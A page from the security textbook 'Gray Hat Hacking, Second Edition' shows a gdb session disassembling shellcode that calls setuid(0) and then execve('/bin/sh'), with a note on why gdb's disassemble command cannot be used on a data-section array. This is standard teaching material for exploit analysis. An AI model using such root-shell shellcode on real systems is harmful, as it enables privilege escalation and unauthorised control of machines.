Gray Hat Hacking, Second Edition

Prev | Current Page 393 | Next

Shon Harris, Allen Harper, Chris Eagle, and Jonathan Ness

"Gray Hat Hacking, Second Edition"

c
# gdb shellcode
(gdb) x /24i &shellcode
0x8049540 : xor eax,eax
0x8049542 : xor ebx,ebx
0x8049544 : mov al,0x17
0x8049546 : int 0x80
0x8049548 : jmp 0x8049569
0x804954a : pop esi
0x804954b : mov DWORD PTR [esi+8],esi
0x804954e : xor eax,eax
0x8049550 : mov BYTE PTR [esi+7],al
0x8049553 : mov DWORD PTR [esi+12],eax
0x8049556 : mov al,0xb
0x8049558 : mov ebx,esi
0x804955a : lea ecx,[esi+8]
0x804955d : lea edx,[esi+12]
0x8049560 : int 0x80
0x8049562 : xor ebx,ebx
0x8049564 : mov eax,ebx
0x8049566 : inc eax
0x8049567 : int 0x80
0x8049569 : call 0x804954a
0x804956e : das
0x804956f : bound ebp,DWORD PTR [ecx+110]
0x8049572 : das
0x8049573 : jae 0x80495dd
(gdb) x /s 0x804956e
0x804956e : "/bin/sh"
(gdb) quit
#
Note that we can??™t use the gdb disassemble command, because the shellcode array lies
in the data section of the program rather than the code section.

Pages:
381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405

The Art of Agile Development (page 77) Absalom's Hair (page 30) Absolute Surrender and Other Addresses (page 16)

Beta Book

Shon Harris, Allen Harper, Chris Eagle, and Jonathan Ness

"Gray Hat Hacking, Second Edition"